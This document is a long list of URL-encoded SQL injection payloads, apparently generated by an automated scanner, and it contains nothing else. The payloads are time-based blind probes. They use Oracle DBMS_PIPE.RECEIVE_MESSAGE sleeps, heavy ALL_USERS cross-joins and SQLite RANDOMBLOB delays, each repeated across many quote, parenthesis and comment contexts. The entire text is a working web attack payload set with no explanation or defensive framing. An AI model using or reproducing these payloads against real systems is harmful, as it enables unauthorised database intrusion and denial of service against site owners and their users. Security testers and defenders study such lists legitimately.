1234.5%27%2B%28SELECT%20ShKa%20WHERE%208752%3D8752%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%2B%28SELECT%20%27TqwV%27%20WHERE%203241%3D3241%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%22%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%283117%3D3117 1234.5%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%287780%3D7780 1234.5%29%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%284052%3D4052 1234.5%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27NQpT%27%3D%27NQpT 1234.5%27%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27GwUh%27%3D%27GwUh 1234.5%27%29%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27tgxx%27%3D%27tgxx 1234.5%27%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27RMOu%27%3D%27RMOu 1234.5%27%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27ejbo%27%20LIKE%20%27ejbo 1234.5%27%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27exAW%27%20LIKE%20%27exAW 1234.5%27%29%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27kRRp%27%20LIKE%20%27kRRp 1234.5%27%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27LpeA%27%20LIKE%20%27LpeA 1234.5%22%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22ylXp%22%3D%22ylXp 1234.5%22%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22iAgh%22%3D%22iAgh 1234.5%22%29%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22KNIb%22%3D%22KNIb 1234.5%22%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22qIRz%22%3D%22qIRz 1234.5%22%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22hrID%22%20LIKE%20%22hrID 1234.5%22%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22mUrD%22%20LIKE%20%22mUrD 1234.5%22%29%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22eMRh%22%20LIKE%20%22eMRh 1234.5%22%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22BNhg%22%20LIKE%20%22BNhg 1234.5%25%27%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27GcEc%27%3D%27GcEc 1234.5%00%27%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27hnqP%27%3D%27hnqP 1234.5%27%29%20WHERE%203007%3D3007%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1234.5%22%29%20WHERE%201122%3D1122%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1234.5%29%20WHERE%206955%3D6955%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1234.5%27%20WHERE%207884%3D7884%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1234.5%22%20WHERE%206886%3D6886%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1234.5%20WHERE%201585%3D1585%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27fdCO%27%20FROM%20DUAL%20WHERE%203795%3D3795%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27zmec%27%20WHERE%204364%3D4364%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20oGCO%20WHERE%208882%3D8882%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27kGtW%27%20WHERE%209378%3D9378%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206824%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%23 1234.5%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%29%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%25%27%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%25%27%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%25%27%29%29%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%25%27%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%00%27%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%00%27%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20WHERE%205483%3D5483%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%29%20WHERE%202827%3D2827%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%29%20WHERE%209212%3D9212%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20WHERE%205559%3D5559%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%20WHERE%204227%3D4227%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%20WHERE%206580%3D6580%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%7C%7C%28SELECT%20%27yICi%27%20FROM%20DUAL%20WHERE%201772%3D1772%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%7C%7C%28SELECT%20%27dvIg%27%20WHERE%203726%3D3726%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%2B%28SELECT%20gSrI%20WHERE%201706%3D1706%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%2B%28SELECT%20%27VaKw%27%20WHERE%205272%3D5272%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%202999%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1234.5%27%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1234.5%27%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1234.5%22%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1234.5%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%282992%3D2992 1234.5%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%289878%3D9878 1234.5%29%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%281766%3D1766 1234.5%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1234.5%27%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27ViQM%27%3D%27ViQM 1234.5%27%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27czHq%27%3D%27czHq 1234.5%27%29%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27ZcrA%27%3D%27ZcrA 1234.5%27%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27OgZd%27%3D%27OgZd 1234.5%27%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27IFgV%27%20LIKE%20%27IFgV 1234.5%27%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27IhTF%27%20LIKE%20%27IhTF 1234.5%27%29%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27enTz%27%20LIKE%20%27enTz 1234.5%27%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27sEik%27%20LIKE%20%27sEik 1234.5%22%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22edkJ%22%3D%22edkJ 1234.5%22%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22XpPC%22%3D%22XpPC 1234.5%22%29%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22ftOe%22%3D%22ftOe 1234.5%22%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22Zflv%22%3D%22Zflv 1234.5%22%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22bUBU%22%20LIKE%20%22bUBU 1234.5%22%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22nUTi%22%20LIKE%20%22nUTi 1234.5%22%29%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22NLbh%22%20LIKE%20%22NLbh 1234.5%22%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22YiLJ%22%20LIKE%20%22YiLJ 1234.5%25%27%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27RXJo%27%3D%27RXJo 1234.5%00%27%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27ZRWO%27%3D%27ZRWO 1234.5%27%29%20WHERE%201739%3D1739%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1234.5%22%29%20WHERE%209873%3D9873%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1234.5%29%20WHERE%206392%3D6392%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1234.5%27%20WHERE%206201%3D6201%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1234.5%22%20WHERE%206242%3D6242%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1234.5%20WHERE%208242%3D8242%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27bwKZ%27%20FROM%20DUAL%20WHERE%201901%3D1901%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27PHrx%27%20WHERE%208628%3D8628%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20jxlx%20WHERE%208449%3D8449%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27MJao%27%20WHERE%202037%3D2037%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%203681%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%23 1234.5%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 